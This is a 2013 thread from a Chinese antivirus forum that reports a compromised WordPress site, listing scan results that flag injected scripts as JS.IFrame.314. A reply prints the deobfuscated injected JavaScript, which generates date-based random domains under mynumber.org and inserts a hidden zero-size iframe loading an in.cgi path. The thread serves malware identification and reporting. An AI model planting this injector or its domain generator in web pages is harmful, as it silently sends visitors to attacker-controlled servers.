查看: 943|回复: 1
收起左侧

[已鉴定] baristekin.com/main/?_escaped_fragment_=?p=389?feed=rss【挂马BY哀酱】

[复制链接]
fireold
发表于 2013-6-10 20:37:27 | 显示全部楼层 |阅读模式
本帖最后由 哀酱俏佳人 于 2013-6-10 20:56 编辑

h ttp://baristekin.com/main/?_escaped_fragment_=?p=389?feed=rss

no.jpg


Checking: http://baristekin.com/main/wp-includes/js/swfobject.js?ver=2.2-20120417
File size: 10231 bytes
File MD5: 9ffdba2cff497d701684657e329871f5

http://baristekin.com/main/wp-includes/js/swfobject.js?ver=2.2-20120417 - Ok



Checking: http://baristekin.com/main/wp-includes/js/comment-reply.js?ver=3.4.2
File size: 786 bytes
File MD5: 500ceaa723d95be311592bd902d6823e

http://baristekin.com/main/wp-includes/js/comment-reply.js?ver=3.4.2 - archive JS-HTML
>http://baristekin.com/main/wp-includes/js/comment-reply.js?ver=3.4.2/JSFile_1[0][312] - Ok
http://baristekin.com/main/wp-includes/js/comment-reply.js?ver=3.4.2 - Ok



Checking: http://baristekin.com/main/wp-content/themes/RightNow/js/froogaloop.js
File size: 8561 bytes
File MD5: 3122413617eb18bc8b3a97be00728674

http://baristekin.com/main/wp-content/themes/RightNow/js/froogaloop.js - Ok



Checking: http://baristekin.com/main/wp-content/themes/RightNow/js/jquery.easing.1.3.js
File size: 8097 bytes
File MD5: 6516449ed5089677ed3d7e2f11fc8942

http://baristekin.com/main/wp-content/themes/RightNow/js/jquery.easing.1.3.js - archive JS-HTML
>http://baristekin.com/main/wp-content/themes/RightNow/js/jquery.easing.1.3.js/JSFile_1[0][1fa1] - Ok
http://baristekin.com/main/wp-content/themes/RightNow/js/jquery.easing.1.3.js - Ok



Checking: http://baristekin.com/main/wp-content/themes/RightNow/plugins/ajax-comment-posting/jquery.form.js?ver=3.4.2
File size: 27.38 KB
File MD5: 1015ec09e6df09ae6c54f08d25aeccad

http://baristekin.com/main/wp-content/themes/RightNow/plugins/ajax-comment-posting/jquery.form.js?ver=3.4.2 - Ok



Checking: http://baristekin.com/main/wp-content/themes/RightNow/js/jquery.mousewheel.min.js
File size: 1392 bytes
File MD5: 25db04e9daee1c00f6ca337537c32c01

http://baristekin.com/main/wp-content/themes/RightNow/js/jquery.mousewheel.min.js - archive JS-HTML
>http://baristekin.com/main/wp-content/themes/RightNow/js/jquery.mousewheel.min.js/JSFile_1[0][570] - Ok
http://baristekin.com/main/wp-content/themes/RightNow/js/jquery.mousewheel.min.js - Ok



Checking: http://baristekin.com/main/wp-content/themes/RightNow/js/jquery.validate.min.js
File size: 24.77 KB
File MD5: 7c8f6ee816c71933a8f93966b34e458c

http://baristekin.com/main/wp-content/themes/RightNow/js/jquery.validate.min.js - Ok



Checking: http://baristekin.com/main/wp-includes/js/jquery/jquery.js?ver=1.7.2
File size: 92.64 KB
File MD5: d2985bb2ef1e276824161ffb6fa91338

http://baristekin.com/main/wp-includes/js/jquery/jquery.js?ver=1.7.2 - archive JS-HTML
>http://baristekin.com/main/wp-includes/js/jquery/jquery.js?ver=1.7.2/JSTag_1[1249a][4df3] - Ok
http://baristekin.com/main/wp-includes/js/jquery/jquery.js?ver=1.7.2 - Ok



Checking: http://baristekin.com/main/wp-content/themes/RightNow/main.js
File size: 58.70 KB
File MD5: be9ea6b1b9d5666d3109d28b35cd5a01

http://baristekin.com/main/wp-content/themes/RightNow/main.js - Ok



Checking: http://baristekin.com/main/wp-content/themes/RightNow/js/clip.js
File size: 2754 bytes
File MD5: 60829c2c9ccde76c76fe9fb88958aee2

http://baristekin.com/main/wp-content/themes/RightNow/js/clip.js - archive JS-HTML
>http://baristekin.com/main/wp-content/themes/RightNow/js/clip.js/JSFile_1[0][ac2] - Ok
http://baristekin.com/main/wp-content/themes/RightNow/js/clip.js - Ok



Checking: http://baristekin.com/main/wp-content/themes/RightNow/plugins/ajax-comment-posting/acp.js?ver=3.4.2
File size: 3790 bytes
File MD5: ceeda5203bd005545fb48674feb3fa49

http://baristekin.com/main/wp-content/themes/RightNow/plugins/ajax-comment-posting/acp.js?ver=3.4.2 - Ok



Checking: http://maps.googleapis.com/maps/api/js?sensor=true
File size: 2710 bytes
File MD5: 70f16a135f2731fb2564d75ecefd9edf

http://maps.googleapis.com/maps/api/js?sensor=true - Ok



Checking: http://baristekin.com/main/wp-content/themes/RightNow/js/jquery.history.js
File size: 6467 bytes
File MD5: 411ee7f3e79a90a6e3817e820a8f2ebb

http://baristekin.com/main/wp-content/themes/RightNow/js/jquery.history.js - Ok



Checking: http://baristekin.com/main/wp-content/themes/RightNow/js/jquery.quicksand.js
File size: 14.35 KB
File MD5: 3bc84a2b9acf5f6cc1f372a71440d100

http://baristekin.com/main/wp-content/themes/RightNow/js/jquery.quicksand.js - archive JS-HTML
>http://baristekin.com/main/wp-content/themes/RightNow/js/jquery.quicksand.js/JSFile_1[0][3969] - Ok
http://baristekin.com/main/wp-content/themes/RightNow/js/jquery.quicksand.js - Ok



Checking: http://baristekin.com/main/wp-content/themes/RightNow/jwplayer/jwplayer.js
File size: 136.82 KB
File MD5: d07a391c101d6ebb013b7b43fd82ec72

http://baristekin.com/main/wp-content/themes/RightNow/jwplayer/jwplayer.js - Ok

Checking: http://baristekin.com/main/?_escaped_fragment_=?p=389?feed=rss
Engine version: 7.0.4.9250
Total virus-finding records: 4121015
File size: 65.56 KB
File MD5: 9cbccee5c125e3dc0682a8e2cb5d32c9

http://baristekin.com/main/?_escaped_fragment_=?p=389?feed=rss - archive JS-HTML
>http://baristekin.com/main/?_escaped_fragment_=?p=389?feed=rss/JSTAG_1[c8][185c] infected with JS.IFrame.314
>http://baristekin.com/main/?_escaped_fragment_=?p=389?feed=rss/JSTAG_2[19ce][185c] infected with JS.IFrame.314
>http://baristekin.com/main/?_escaped_fragment_=?p=389?feed=rss/JSTAG_3[3db3][1b0] - Ok
>http://baristekin.com/main/?_escaped_fragment_=?p=389?feed=rss/JSTAG_4[4053][1ac] - Ok
>http://baristekin.com/main/?_escaped_fragment_=?p=389?feed=rss/JSTAG_5[422a][457] - Ok
>http://baristekin.com/main/?_escaped_fragment_=?p=389?feed=rss/JSTAG_6[4862][185c] infected with JS.IFrame.314



哀酱俏佳人
发表于 2013-6-10 20:55:59 | 显示全部楼层
  1. function nextRandomNumber(){
  2.   var hi = this .seed / this .Q;
  3.   var lo = this .seed % this .Q;
  4.   var test = this .A * lo - this .R * hi;
  5.   if (test > 0){
  6.     this .seed = test;
  7.   }
  8.   else {
  9.     this .seed = test + this .M;
  10.   }
  11.   return (this .seed * this .oneOverM);
  12. }
  13. function RandomNumberGenerator(unix){
  14.   var d = new Date(unix * 1000);
  15.   var s = Math.ceil(d.getHours() / 3);
  16.   this .seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.
  17.   round(s * 0xFFF));
  18.   this .A = 48271;
  19.   this .M = 2147483647;
  20.   this .Q = this .M / this .A;
  21.   this .R = this .M % this .A;
  22.   this .oneOverM = 1.0 / this .M;
  23.   this .next = nextRandomNumber;
  24.   return this ;
  25. }
  26. function createRandomNumber(r, Min, Max){
  27.   return Math.round((Max - Min) * r.next() + Min);
  28. }
  29. function generatePseudoRandomString(unix, length, zone){
  30.   var rand = new RandomNumberGenerator(unix);
  31.   var letters = "qmahgwctopfjilrfpjrfcwgewheizwdw".split('');
  32.   var str = '';
  33.   for (var i = 0; i < length; i ++ ){
  34.     str += letters[createRandomNumber(rand, 0, letters.length - 1)];
  35.   }
  36.   return str + '.' + zone;
  37. }
  38. setInterval(function (){
  39.   try {
  40.     if (typeof iframeWasCreated == "undefined"){
  41.       var unix = Math.round( + new Date() / 1000);
  42.       var domainName = generatePseudoRandomString(unix, 16, 'mynumber.org');
  43.       ifrm = document.createElement("IFRAME");
  44.       ifrm.setAttribute("src", "http://" + domainName + "/in.cgi?14");
  45.       ifrm.style.width = "0px";
  46.       ifrm.style.height = "0px";
  47.       ifrm.style.visibility = "hidden";
  48.       document.body.appendChild(ifrm);
  49.       iframeWasCreated = true;
  50.     }
  51.   }
  52.   catch (e){
  53.     iframeWasCreated = undefined;
  54.   }
  55. }
  56. , 100);
复制代码
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-3 07:03 , Processed in 0.139125 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表